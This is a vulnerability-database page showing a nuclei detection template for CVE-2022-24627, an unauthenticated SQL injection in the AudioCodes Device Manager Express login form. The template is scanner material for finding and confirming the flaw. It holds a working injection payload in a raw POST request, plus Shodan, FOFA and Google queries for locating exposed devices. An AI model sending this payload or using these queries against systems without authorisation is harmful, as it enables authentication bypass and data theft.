Lucene search
K

AudioCodes Device Manager Express - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 62 Views

AudioCodes Device Manager Express SQL Injection CVE-2022-2462

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Device Manager Express 7.8.20002.47752 SQL Injection / XSS / Code Execution / Traversal
27 Feb 202300:00
zdt
ATTACKERKB
CVE-2022-24627
29 May 202321:15
attackerkb
Circl
CVE-2022-24627
30 May 202300:36
circl
CNNVD
AudioCodes Device Manager Express SQL注入漏洞
24 Feb 202300:00
cnnvd
CVE
CVE-2022-24627
29 May 202300:00
cve
Cvelist
CVE-2022-24627
29 May 202300:00
cvelist
Exploit DB
Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
30 Mar 202300:00
exploitdb
NVD
CVE-2022-24627
29 May 202321:15
nvd
OSV
CVE-2022-24627
29 May 202321:15
osv
Packet Storm
Device Manager Express 7.8.20002.47752 SQL Injection / XSS / Code Execution / Traversal
23 Feb 202300:00
packetstorm
Rows per page
id: CVE-2022-24627

info:
  name: AudioCodes Device Manager Express - SQL Injection
  author: geeknik
  severity: critical
  description: |
    An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
  impact: |
    Unauthenticated attackers can exploit SQL injection in the login form to bypass authentication, extract sensitive VoIP configuration data, and potentially gain administrative access to the AudioCodes Device Manager system.
  remediation: |
    Update AudioCodes Device Manager Express to a version newer than 7.8.20002.47752 that uses parameterized queries and properly validates input.
  reference:
    - https://seclists.org/fulldisclosure/2023/Feb/12
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24627
    - https://github.com/tr3ss/newclei
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24627
    cwe-id: CWE-89
    epss-score: 0.26389
    epss-percentile: 0.97757
    cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: audiocodes
    product: device_manager_express
    shodan-query:
      - title:"Audiocodes"
      - http.title:"audiocodes"
    fofa-query: title="audiocodes"
    google-query: intitle:"audiocodes"
  tags: cve,cve2022,seclists,sqli,audiocodes,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "audiocodes</title>")'
        internal: true

  - raw:
      - |
        POST /admin/AudioCodes_files/process_login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password=&domain=&p=%5C%27or+1%3D1%23

    matchers:
      - type: word
        part: body
        words:
          - "SQL syntax"
          - "mysql_fetch"
          - "You have an error in your SQL syntax"
        condition: or
# digest: 4a0a0047304502206d2ae4ae79c51d6e33ef217b93a98130432de895a97ca4bf73fd5ddf6dd9725b022100afd4ac64d1d5306c7f3117051a13313d969ddc04bd28c89fe2885240d64ee910:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.26389
SSVC
62